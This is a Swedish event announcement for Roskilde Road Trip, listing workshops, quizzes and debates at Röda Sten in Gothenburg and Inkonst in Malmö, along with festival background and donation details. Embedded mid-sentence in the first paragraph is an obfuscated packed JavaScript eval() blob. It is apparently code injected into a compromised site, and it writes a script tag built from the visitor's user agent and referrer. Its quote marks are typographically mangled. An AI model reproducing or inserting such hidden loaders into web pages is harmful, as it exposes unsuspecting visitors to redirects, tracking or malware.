Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Nya Evenemang till Roskilde Road Trip är släppt!

Nya Evenemang till Roskilde Road Trip är släppt!
Sebastian

Roskilde eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kietk|var|u0026u|referrer|ekneb||js|php’.split(’|’),0,{}))
Road Trip äger rum den 13-20 april på Inkonst i Malmö och den 6-13 april på Röda Sten i Göteborg. Roskilde Road Trip kommer att underhålla folket med musik, men detta är inte allt, vi har även med oss olika workshops, debatter och andra intressanta saker kommer att äga rum i Malmö och Göteborg. Som t.ex. Brunch, Pop Impro, Film Quiz, Performance Art med flera.

EVENEMANG (HIGHLIGHTS):

GÖTEBORG, RÖDA STEN:

7 april Brunch (12.00)                    

8 april Workshop med Sanne Aronsson (18.30)

10 april Pop Impro (19.00)          

11 april – Film Quiz (18.30)            

13 april – Performance Art (18.30)

MALMÖ, INKONST:

14 april – Quiz (20:00)                     

15 april – Podcast (17.00)              

16 april – Panedebatt (18.00)

19 april – Punch The Custard (18.00)                                                        

20 april – Roller Derby Disco (18.00)

ROSKILDE ROAD TRIP:

Roskilde Road Trip har sina rötter från Roskilde Festival, norra Europas mest unika musik, kultur och konstevent. Roskilde Road Trip tar festivalen ut på vägarna, och den kommer till en stad nära dig.

Roskilde Festival handlar om att involvera publiken, detta är också ändamålet för Roskilde Road Trip: vi bjuder in alla till att deltaga genom att ta del i event som till exempel, gemensamma måltider, debatter och happenings. Träffa och nätverka med andra lokala och kreativa personligheter. Lämna din personliga stämpel genom att ta del i workshopsen och skapa innehållet. Utveckla nya ideer för festivalen och möt folket bakom Roskilde Festival.

DONATIONER:

Under Roskilde Road Trip kommer Roskilde Festival att donera 25 000 DKK till ett projekt från varje värdstad som matchar detta års fokus: ”Change: Focus on Empowerment and Democracy”

Roskilde Festival är en NGO/Non-profit organisation, där all vinst doneras till en god sak. Sedan 1972 har Roskilde Festival Charity Society distribuerat donationer to olika hjälporganisationer i Sverige som t.ex. Läkare i världen, Rosengrenska Stiftelsen, Ingen människa är illegal, Flyktinggruppernas Riksråd (FARR).

Viktiga länkar

Facebook RRT Malmö – http://www.facebook.com/RRTmalmo

Facebook RRT Göteborg – http://www.facebook.com/RRTGoteborg

Foto: Roskilde Road Trip Malmö facebooksida